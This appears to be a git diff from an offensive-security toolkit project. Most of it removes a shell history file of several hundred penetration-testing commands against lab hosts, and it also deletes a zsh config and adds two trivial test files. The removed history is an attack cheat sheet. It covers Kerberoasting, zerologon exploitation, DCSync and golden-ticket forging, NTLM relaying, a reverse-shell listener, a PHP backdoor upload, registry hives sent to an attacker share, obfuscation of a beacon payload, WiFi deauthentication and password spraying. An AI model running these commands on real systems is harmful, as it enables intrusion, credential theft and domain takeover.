/opt/tools/kiterunner/routes-small.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34 -cme smb 192.168.56.0/24 -u anonymous -p anonymous --shares -cme smb 192.168.56.0/24 -u '' -p '' --shares -cme smb 192.168.56.0/24 -u anonymous -p anonymous --sessions -cme smb 192.168.56.0/24 -u anonymous -p anonymous --loggedon-users -cme smb 192.168.56.0/24 --local-auth -u '' -p '' -privexchange.py -ah 192.168.56.1 -d BREAKING.BAD -u anonymous -p anonymous EXCHANGE.BREAKING.BAD -neo4j start -lnk-generate.py --host 192.168.56.1 --type ntlm --output 
'@SHUTDOWN-LNK.lnk' -autorecon 192.168.10.10 -nmap --script=ldap-search -p 389 192.168.10.10 -nmap -p 5900 --script=realvnc-auth-bypass 192.168.10.10 -dirb http://192.168.10.10 /usr/share/seclists/Discovery/Web-Content/big.txt -gobuster dir -w `fzf-wordlists` -t 20 -x php,txt,pl,sh,asp,aspx,html,json,py,cfm,rb,cgi,bak,tar.gz,tgz,zip -u http://192.168.10.10/ -smtp-user-enum -M RCPT -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.10.10 -smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.10.10 -smtp-user-enum -M EXPN -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.10.10 -onesixtyone 192.168.10.10 private -onesixtyone 192.168.10.10 public -onesixtyone 192.168.10.10 manager -onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 192.168.10.10 -snmpwalk -c public -v 1 192.168.10.10 -snmpwalk -c public -v 2c 192.168.10.10 -cewl --depth 10 --with-numbers --write cewl.txt 192.168.10.10 -wpscan --api-token APITOKEN --url http://192.168.10.10/ --no-banner --plugins-version-detection passive --password-attack xmlrpc -U 'admin' -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -wpscan --api-token APITOKEN --url http://192.168.10.10/ --no-banner --plugins-detection aggressive -wpscan --api-token APITOKEN --url http://192.168.10.10/ --no-banner --enumerate u1-20 -nmblookup -A 192.168.10.10 -nmap --script 'smb-enum*' --script-args unsafe=1 -T5 192.168.10.10 -smbmap -H 192.168.10.10 -smbmap -u guest -H 192.168.10.10 -smbmap -H 192.168.10.10 -R -smbmap -H 192.168.10.10 -R test -smbclient --list 192.168.10.10 -smbclient --no-pass --user '' //192.168.10.10/SYSVOL -smbclient --no-pass --user '' --list 192.168.10.10 -smbclient.py BREAKING.BAD/user:astrongpassword@192.168.56.201 -nmap --script smb-enum-shares -p 139,445 -T4 -Pn 192.168.10.10 -amap -d 192.168.10.10 4455 -nikto -host 192.168.10.10 -dotdotpwn -m payload -h 192.168.10.10 -x 80 -p request.req -k 
'root:' -f /etc/passwd -dotdotpwn -m stdout -d 5 -f /etc/passwd -kadimus -u 'http://192.168.10.10/?page=file1.php' -kadimus --cookie 'PHPSESSID=qsh5s21mo54qds7v5384f1q34' -u 'http://192.168.10.10/?page=file1.php' -shellerator --reverse-shell --ip 192.168.56.1 --port 1337 --type powershell -shellerator -rlwrap nc -lvnp 1337 -GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip 192.168.56.101 BREAKING.BAD/ -GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip 192.168.56.101 BREAKING.BAD/anonymous:anonymous -GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -usersfile users.txt -dc-ip 192.168.56.101 BREAKING.BAD/ -GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 -dc-ip 192.168.56.101 BREAKING.BAD/Administrator -hashcat --status --hash-type 18200 --attack-mode 0 ASREProastables.txt `fzf-wordlists` -john --wordlist=`fzf-wordlists` ASREProastables.txt -GetUserSPNs.py -outputfile Kerberoastables.txt -dc-ip 192.168.56.101 BREAKING.BAD/anonymous:anonymous -GetUserSPNs.py -outputfile Kerberoastables.txt -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 -dc-ip 192.168.56.101 BREAKING.BAD/Administrator -hashcat --status --hash-type 13100 --attack-mode 0 Kerberoastables.txt `fzf-wordlists` -john --format=krb5tgs --wordlist=`fzf-wordlists` Kerberoastables.txt -polenum -u anonymous -p anonymous -d DC01.BREAKING.BAD -cme smb 192.168.56.101 -u '' -p '' --pass-pol -addcomputer.py -computer-name 'SHUTDOWN$' -computer-pass '123soleil!' 
-dc-host DC01 -domain-netbios BREAKING.BAD 'BREAKING.BAD/anonymous:anonymous' -smbexec.py -share 'ADMIN$' -k SV01.BREAKING.BAD -wmiexec.py -k SV01.BREAKING.BAD -getST.py -spn CIFS/SV01@BREAKING.BAD -impersonate Administrator -dc-ip 192.168.56.101 'BREAKING.BAD/SHUTDOWN$:123soleil' -getST.py -spn RPCSS/SV01.BREAKING.BAD -impersonate Administrator -dc-ip 192.168.56.101 'BREAKING.BAD/SHUTDOWN$:123soleil' -secretsdump -just-dc-user krbtgt -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 'BREAKING.BAD/Administrator@dc01.breaking.bad' -lookupsid.py -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 'BREAKING.BAD/Administrator@dc01.breaking.bad' 0 -ticketer.py -nthash 0123456789krbtgtnthash0123456789 -domain-sid S-1-5-11-39129514-1145628974-103568174 -domain BREAKING.BAD randomuser -ticketer.py -nthash 01234567890sv01nthash01234567890 -domain-sid S-1-5-11-39129514-1145628974-103568174 -domain BREAKING.BAD -spn HOST/SV01.BREAKING.BAD randomuser -export KRB5CCNAME=randomuser.ccache -secretsdump -k SV01.BREAKING.BAD -hashcat --status --hash-type 1000 --attack-mode 0 --username BREAKING.BAD.ntds `fzf-wordlists` -hashcat --hash-type 1000 --potfile-path BREAKING.BAD.ntds.cracked BREAKING.BAD.ntds --show --username -cme ldap 192.168.56.101 -d BREAKING.BAD -u anonymous -p anonymous --asreproast ASREProastables.txt --kdcHost 192.168.56.101 -cme ldap 192.168.56.101 -d BREAKING.BAD -u anonymous -p anonymous --kerberoasting Kerberoastables.txt --kdcHost 192.168.56.101 -ldapsearch -x -h 192.168.56.101 -D '' -w '' -b "dc=BREAKING,dc=BAD" -addspn.py -u 'BREAKING\SV01$' -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -s HOST/SHUTDOWN.BREAKING.BAD --additional DC01.BREAKING.BAD -dnstool.py -u 'BREAKING\SV01$' -p aad3b435b51404eeaad3b435b51404ee:c1c635aa12ae60b7fe39e28456a7bac6 -r SHUTDOWN.BREAKING.BAD -d 192.168.56.1 --action add DC01.BREAKING.BAD -krbrelayx.py -aesKey 9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab -addspn.py -u 'BREAKING\serviceaccount' -p P4ssw0rd 
-t SV01 -s HTTP/SHUTDOWN.BREAKING.BAD --additional DC01.BREAKING.BAD -dnstool.py -u 'BREAKING\serviceaccount' -p P4ssw0rd -r SHUTDOWN.BREAKING.BAD -d 192.168.56.1 --action add DC01.BREAKING.BAD -dnstool.py -u 'BREAKING\serviceaccount' -p P4ssw0rd -r SHUTDOWN.BREAKING.BAD -d 192.168.56.1 --action query DC01.BREAKING.BAD -privexchange.py -u serviceaccount -p P4ssw0rd -ah SHUTDOWN.BREAKING.BAD EXCHANGE.BREAKING.BAD -d BREAKING.BAD -krbrelayx.py --krbpass P4ssw0rd --krbsalt BREAKING.BADSV01 -t ldap://dc01.breaking.bad --escalate-user serviceaccount -wfuzz -c --hw 157 -L -w `fzf-wordlists` -w `fzf-wordlists` -X POST -d 'username=FUZZ&password=FUZ2Z' -u http://192.168.10.10/admin -wfuzz --hc 401 -c -v -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -w /usr/share/seclists/Passwords/darkweb2017-top100.txt --basic FUZZ:FUZ2Z -u http://192.168.10.10/secretpage -pypykatz lsa minidump lsass.dmp -enyx 1 public 192.168.10.10 -wfuzz --hc 403,404 -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt -u http://192.168.10.10/FUZZFUZ2Z -fcrackzip -u -v -D -p /usr/share/wordlists/rockyou.txt file.zip -ffuf -fs 185 -c -w `fzf-wordlists` -H 'Host: FUZZ.machine.org' -u http://192.168.10.10/ -ffuf -fs 185 -c -w `fzf-wordlists` -H 'Host: FUZZ.org' -u http://192.168.10.10/ -ffuf -c -w `fzf-wordlists` -e .php,.txt,.pl,.sh,.asp,.aspx,.html,.json,.py,.cfm,.rb,.cgi,.bak,.tar.gz,.tgz,.zip -u http://192.168.10.10/FUZZ -ffuf -c -w `fzf-wordlists` -u http://192.168.10.10/FUZZ --extract-links -ffuf -c -w `fzf-wordlists` -u http://192.168.10.10/FUZZ -wfuzz --hh 185 -c -w `fzf-wordlists` -H "Host: FUZZ.machine.org" -u http://192.168.10.10/ -wfuzz --hh 185 -c -w `fzf-wordlists` -H "Host: FUZZ.org" -u http://192.168.10.10/ -evil-winrm -u serviceaccount -p P4ssw0rd -i 192.168.56.101 -evil-winrm -u serviceaccount -H c1c635aa12ae60b7fe39e28456a7bac6 -i 192.168.56.101 -cme smb 192.168.56.101 --continue-on-success -u users.txt -p 
passwords.txt -cme smb 192.168.56.101 --continue-on-success --no-bruteforce -u users.txt -p passwords.txt -smbpasswd -U BREAKING/serviceaccount -r 192.168.56.101 -enum4linux-ng -A -u BREAKING/serviceaccount -p 'P@ssword' 192.168.56.101 -enum4linux-ng -A 192.168.59.101 -enum4linux-ng -L 192.168.59.101 -nmap -sS -p 3268,3269 192.168.56.0/24 -nmap -sC -sV -p 139,445,80,21 192.168.56.201 -nmap -Pn -v -sS -F 192.168.56.0/24 -curl http://192.168.10.10/ --upload-file backdoor.php -v -net rpc password 'someuser' 'somepassword' -U 'BREAKING.BAD'/'anotheruser'%'P@ssword' -S 'DC01.BREAKING.BAD' -net rpc user add 'someuser' 'somepassword' -U 'BREAKING.BAD'/'anotheruser'%'P@ssword' -S 'DC01.BREAKING.BAD' -pth-net rpc password 'someuser' 'somepassword' -U 'BREAKING.BAD'/'anotheruser'%'ffffffffffffffffffffffffffffffff':'c1c635aa12ae60b7fe39e28456a7bac6' -S 'DC01.BREAKING.BAD' -zerologon-scan DC01 192.168.56.101 -zerologon-exploit DC01 192.168.56.101 -secretsdump -no-pass 'BREAKING.BAD'/'DC01$'@'dc01.breaking.bad' -secretsdump -hashes :a88baa3fdc8f581ee0fb05d7054d43e4 BREAKING.BAD/Administrator@dc01.breaking.bad -zerologon-restore breaking/dc01@dc01 -target-ip 192.168.56.101 -hexpass 69762...6945d -pm3 -p /dev/ttyACM0 -proxmark3 -p /dev/ttyACM0 -nmap --script http-ntlm-info --script-args http-ntlm-info.root=/ews/ -p 443 mx.example.com -ruler -k -d example.com -u j.doe -p 'Passw0rd!' 
-e j.doe@example.com --verbose abk dump -o emails.txt -ruler -k -d example.com brute --users owa-valid-users.txt --passwords passwords.txt --delay 35 --attempts 3 --verbose | tee -a spray-results.txt -oaburl.py MEGACORP/j.doe:'Passw0rd!'@mx.example.com -e existent.email@example.com -cypheroth -u neo4j -p exegol4thewin -d BREAKING.BAD -nmap -sS -n --open -p 88 192.168.56.0/24 -windapsearch --dc 192.168.56.101 --module metadata -windapsearch --dc 192.168.56.101 --module users -nmap --script broadcast-dhcp-discover -SimplyEmail -all -e cybersyndicates.com -ssh-keygen -t rsa -b 4096 -f keyname -hashcat --username --hash-type 0 --attack-mode 0 MD5_hashes.txt `fzf-wordlists` -rbcd.py t-delegate-to 'sv01$' -dc-ip dc01 -action read 'BREAKING/anonymous:anonymous' -rbcd.py -delegate-from 'shutdown' -delegate-to 'sv01$' -dc-ip dc01 -action write 'BREAKING/anonymous:anonymous' -rbcd.py -delegate-from 'shutdown' -delegate-to 'sv01$' -dc-ip dc01 -action remove 'BREAKING/anonymous:anonymous' -xfreerdp /d:BREAKING.BAD /u:someuser /pth:c1c635aa12ae60b7fe39e28456a7bac6 /v:SV01.BREAKING.BAD /cert-ignore -darkarmour -f /data/beacon.exe --encrypt xor --jmp --loop 7 -o /data/legit.exe -amber -f beacon.exe -hcxdumptool -I -hcxdumptool -i wlan1 -o dump.pcapng --active_beacon --enable_status=1 -hcxpcapngtool -o dump.hashcat dump.pcapng -hcxhashtool -i dump.hashcat --info stdout -hashcat --hash-type 16800 --attack-mode 0 dump_WPA-PMKID-PBKDF2.hashcat `fzf-wordlists` -hcxpcapngtool --all -o dump.hashcat dump.pcapng -hashcat --hash-type 22000 --attack-mode 0 dump_WPA-PBKDF2-PMKID_EAPOL.hashcat `fzf-wordlists` -responder --interface eth0 --analyze --lm --disable-ess -ntlmv1-multi --ntlmv1 SV01$::BREAKING.BAD:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:1122334455667788 -airmon-ng start wlan1 -airodump-ng wlan1 -airodump-ng -c 1 wlan1 -aireplay-ng --deauth 10 -a TR:GT:AP:BS:SS:ID wlan1 -sublist3r -v -d example.com -subjack -w subdomains.txt 
-t 100 -timeout 30 -o results.txt -ssl -holehe test@gmail.com -theHarvester.py -d example.com -g -s -r -f example.com.xml -b all -infoga.py -d example.com -s all -b -r example.com.txt -v 2 -h8mail -t test@gmail.com -phoneinfoga scan -n 33123456789 -maigret user -linkedin2username.py -u myname@email.com -c uber-com -toutatis.py -s SESSIONID -u starbucks -twint -u username --since "2015-12-20 20:30:15" -twint -g="48.880048,2.385939,1km" -o file.csv --csv -ipinfo 1.1.1.1 -onionsearch "computer" -onionsearch "computer" --engines tor66 deeplink phobos --limit 3 -waybackurls test.com -carbon14.py http://menfous.com/ -github-email ghusername -WikiLeaker google.com -tiktok-scraper user USERNAME -d -n 100 -buster -e 'j********9@g****.com' -f john -l doe -b '****1989' -cloudfail.py --target seo.com --tor -assetfinder google.com -subfinder -d freelancer.com -theHarvester -d github.com -b all -nfc-scan-device -v -nfc-list -mfoc -O original.dmp -mfoc -O magic-gen1.dmp -mfdread original.dmp -nfc-mfclassic W A B original.dmp magic-gen1.dmp -libnfc_crypto1_crack a0a1a2a3a4a5 0 A 4 B -mfoc -O original.dmp -k keys.txt -nrf24-scanner.py -l -v -jackit --reset --debug -secretsdump -ntds ntds.dit.save -system system.save LOCAL -gosecretsdump -ntds ntds.dit.save -system system.save -screen /dev/ttyACM0 115200 -httpmethods --threads 40 --location http://www.s01.breaking.bad/ -hakrawler -url http://www.s01.breaking.bad/ -adidnsdump -u "BREAKING.BAD\someuser" -p 'somepassword' --print-zones 192.168.56.101 -proxychains adidnsdump --dns-tcp -u "BREAKING.BAD\someuser" -p 'somepassword' --print-zones 192.168.56.101 -ngrok authtoken AUTHTOKEN:::https://dashboard.ngrok.com/get-started/your-authtoken -feroxbuster -w `fzf-wordlists` -u http://192.168.10.10/ -bloodhound-import -du neo4j -dp exegol4thewin *.json -bloodhound-quickwin -u neo4j -p exegol4thewin -ldapsearch-ad --server 'dc01.breaking.bad' --domain 'breaking.bad' --username 'someuser' --password 'somepassword' --type all -ldapsearch-ad 
--server 'dc01.breaking.bad' --type info -dnstool.py -u 'BREAKING.BAD\johndoe' -p 'somepassword' --record '*' --action query DC01.BREAKING.BAD -dnstool.py -u 'BREAKING.BAD\johndoe' -p 'somepassword' --record '*' --action add --data 192.168.56.1 DC01.BREAKING.BAD -ntlm-scanner -vuln CVE-2019-1019 -target 'BREAKING.BAD'/'someuser':'somepassword'@'DC01.BREAKING.BAD' -ntlm-scanner -vuln CVE-2019-1338 -target 'BREAKING.BAD'/'someuser':'somepassword'@'DC01.BREAKING.BAD' -ntlm-scanner -vuln CVE-2019-1166 -target 'BREAKING.BAD'/'someuser':'somepassword'@'DC01.BREAKING.BAD' -ntlm-scanner -vuln CVE-2019-1040 -target 'BREAKING.BAD'/'someuser':'somepassword'@'DC01.BREAKING.BAD' -das add -db dbname masscan '-e eth0 --rate 1000 -iL hosts.txt --open -p1-65535' -das add -db dbname rustscan '-b 1000 -t 2000 -u 5000 -a hosts.txt -r 1-65535 -g --no-config --scan-order "Random"' -das scan -db dbname -hosts all -oA report1 -nmap '-Pn -sVC -O' -parallel -das scan -db dbname -ports 22,80,443,445 -show -das report -hosts 192.168.1.0/24 -oA report2 -hashcat --status --hash-type 2100 --attack-mode 0 '$DCC2$10240#user#bb38628253e7681553b72e7da3adf305' `fzf-wordlists` -pypykatz kerberos tgt "kerberos+rc4://BREAKING.BAD\someuser:bb38628253e7681553b72e7da3adf305@domain.local" -ms14-068.py -u someuser@breaking.bad --rc4 0123456789krbtgtnthash0123456789 -s S-1-5-11-39129514-1145628974-103568174 -d dc01.breaking.bad -getST.py -k -no-pass -spn host/dc01.breaking.bad breaking.bad/someuser -ldapdomaindump --user 'breaking.bad\someuser' --password 'somepassword' --outdir ldapdomaindump dc01.breaking.bad -Get-GPPPassword -debug -no-pass dc01.breaking.bad -Get-GPPPassword BREAKING.BAD/someuser:somepassword@DC01.BREAKING.BAD -cme smb --list-modules -cme ldap dc01.breaking.bad -d breaking.bad -u someuser -p somepassword -M maq -ntlmrelayx -t dcsync://dc02.breaking.bad -smb2support -whatportis 3306 -whatportis postgresql -cmsmap -F -d http://192.168.10.10/ -clusterd -i http://192.168.10.10/ -dirsearch -r 
-w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt -u http://192.168.10.10/ -moodlescan -r -u http://192.168.10.10/ -pywhisker.py -v -d 'domain.local' -u 'user2' -H '126f1f9fdb9a7d9c7ba8d269728b7da0' -t 'sv01$' -a 'add' -o 'sv01' -gettgtpkinit.py -cert-pfx 'sv01.pfx' -pfx-pass 'RLLXdD5FhNPRphSqKGg8' 'domain.local'/'sv01$' 'sv01.ccache' -KRB5CCNAME='sv01.ccache' getnthash.py -key '8eb7a6388780dd52eb358769dc53ff685fd135f89c4ef55abb277d7d98995f72' 'domain.local'/'sv01$' -petitpotam.py 192.168.56.1 dc01.breaking.bad -petitpotam.py -d breaking.bad -u someaccount -p somepassword 192.168.56.1 dc01.breaking.bad -ntlmrelayx -t ldap://dc02.breaking.bad -smb2support --remove-mic --shadow-credentials --shadow-target 'dc01$' -targetedKerberoast.py -v -d domain.local -u user1 -p complexpassword -o Kerberoastables.txt -pass-station search tomcat -nth --text 5f4dcc3b5aa765d61d8327deb882cf99 -pywsus.py --host 192.168.56.1 --port 8530 --executable /opt/resources/windows/sysinternals/PsExec64.exe --command '/accepteula /s cmd.exe /c "net localgroup Administrators DOMAIN\controlleduser /add"' -DonPAPI.py breaking.bad/someadmin:somepassword@sometarget -webclientservicescanner -dc-ip dc01.domain.local domain.local/user:password@dc01.domain.local -ntlmrelayx -t http://pki.domain.local/certsrv/certfnsh.asp --adcs -echo '8.8.8.8' | hakrevdns -prips 192.168.0.0 192.168.0.255 -prips -i4 192.168.0.10 192.168.0.250 -prips 173.0.84.0/24 | hakrevdns -nuclei -u https://example.com -ntpdate -u 192.168.56.101 -renameMachine.py -current-name "testcomputer$" -new-name "DC01" -dc-ip dc01 "domain"/"user1":"complexpassword" -getTGT.py -dc-ip dc01 "domain.local"/"DC01":"123pentest" -renameMachine.py -current-name "DC01" -new-name "testcomputer$" -dc-ip dc01 "domain"/"user1":"complexpassword" -KRB5CCNAME="DC01.ccache" getST.py -self -impersonate "domainadmin" -spn "cifs/dc01.domain.local" -k -no-pass -dc-ip dc01 "domain.local"/"dc01" -KRB5CCNAME="domainadmin.ccache" secretsdump 
-just-dc-user "krbtgt" -dc-ip dc01 -k -no-pass @"dc01.domain.local" -KRB5CCNAME="domainadmin.ccache" secretsdump -just-dc-user "krbtgt" -dc-ip dc01 -k -no-pass @"dc01.domain.local" -pwndb --target @example.com --output txt -robotstester -u http://www.example.com/ -L -shadowcoerce.py -d "domain" -u "user1" -p "complexpassword" 192.168.56.1 192.168.56.101 -faketime '2022-01-31 22:05:35' zsh -manspider --threads 50 192.168.56.0/24 -d BREAKING.BAD -u someuser -H bb38628253e7681553b72e7da3adf305 --content administrateur -dcsync.py -dc "dc01.domain.local" -t "CN=someuser,OU=Users,DC=DOMAIN,DC=LOCAL" 'domain\someuser:somepassword' -gMSADumper.py -d "domain.local" -l "dc01.domain.local" -u "someuser" -p "somepassword" -modifyCertTemplate.py -template KerberosAuthentication -get-acl "domain.local"/"someuser":"somepassword" -smbserver.py -smb2support SHUTDOWN . -reg.py 'domain.local/backup_operator:somepassword@192.168.56.101' save -keyName 'HKLM\SAM' -o '\\192.168.56.1\SHUTDOWN' -reg.py 'domain.local/backup_operator:somepassword@192.168.56.101' save -keyName 'HKLM\SYSTEM' -o '\\192.168.56.1\SHUTDOWN' -reg.py 'domain.local/backup_operator:somepassword@192.168.56.101' save -keyName 'HKLM\SECURITY' -o '\\192.168.56.1\SHUTDOWN' -reg.py 'domain.local/backup_operator:somepassword@192.168.56.101' backup -o '\\192.168.56.1\SHUTDOWN' -secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL -pyLAPS.py --action get -d 'domain.local' -u 'someuser' -p 'somepassword' --dc-ip 192.168.56.101 -FindUncommonShares.py -d 'domain.local' -u 'someuser' -p 'somepassword' --dc-ip 192.168.56.101 -certipy find -dc-ip 'domaincontroller' -scheme ldap 'domain.local'/'user':'password'@'domaincontroller' -LdapRelayScan.py -method BOTH -dc-ip 192.168.56.101 -u 'someuser' -p 'somepassword' -goldencopy.py --tools all --password exegol4thewin --stealth --krbtgt 060ee2d06c5648e60a9ed916c9221ad19d90e5fb7b1cccf9d51f540fe991ada1 "john" -# -=-=-=-=-=-=-=- YOUR COMMANDS BELOW -=-=-=-=-=-=-=- # 
diff --git a/sources/zsh/zshrc b/sources/zsh/zshrc deleted file mode 100644 index 519e65ee..00000000 --- a/sources/zsh/zshrc +++ /dev/null @@ -1,34 +0,0 @@ -export ZSH="/root/.oh-my-zsh" -ZSH_THEME="gentoo" - -export FZF_BASE=/opt/tools/fzf - -plugins=(docker docker-compose zsh-syntax-highlighting zsh-completions zsh-autosuggestions tmux fzf zsh-z zsh-nvm) - -source $ZSH/oh-my-zsh.sh - -function prompt_char { - if [ $UID -eq 0 ]; then echo "#"; else echo $; fi -} - -TIME_="%{$fg[white]%}[%{$fg[red]%}%D{%b %d, %Y - %T (%Z)}%{$fg[white]%}]%{$reset_color%}" -PROMPT="$TIME_%{$FX[bold]$FG[013]%} %m %{$fg_bold[blue]%}%(!.%1~.%c) $(prompt_char)%{$reset_color%} " - -export GOPATH=$HOME/go -export GO111MODULE=on -export JOHN=/opt/tools/john/run -export PATH=/opt/tools/bin:$JOHN:$GOPATH/bin:$PATH - -source /opt/.zsh_aliases - -[ -f ~/.fzf.zsh ] && source ~/.fzf.zsh - -# Color correction for zsh-syntax-highlighting -ZSH_AUTOSUGGEST_HIGHLIGHT_STYLE='fg=#626262' - -# In case pipx ensurepath didn't work -export PATH="$PATH:/root/.local/bin" - -export LC_ALL=en_US.UTF-8 -export LANG=en_US.UTF-8 -export LANGUAGE=en_US:en diff --git a/tests/__init__.py b/tests/__init__.py new file mode 100644 index 00000000..534cb8a9 --- /dev/null +++ b/tests/__init__.py @@ -0,0 +1,6 @@ +from tests.test_exegol import test_version + +# Run with python3 setup.py test + +# Test version upgrade +test_version() diff --git a/tests/test_exegol.py b/tests/test_exegol.py new file mode 100644 index 00000000..de88d378 --- /dev/null +++ b/tests/test_exegol.py @@ -0,0 +1,5 @@ +from exegol import __version__ + + +def test_version(): + assert __version__ == '4.0.1'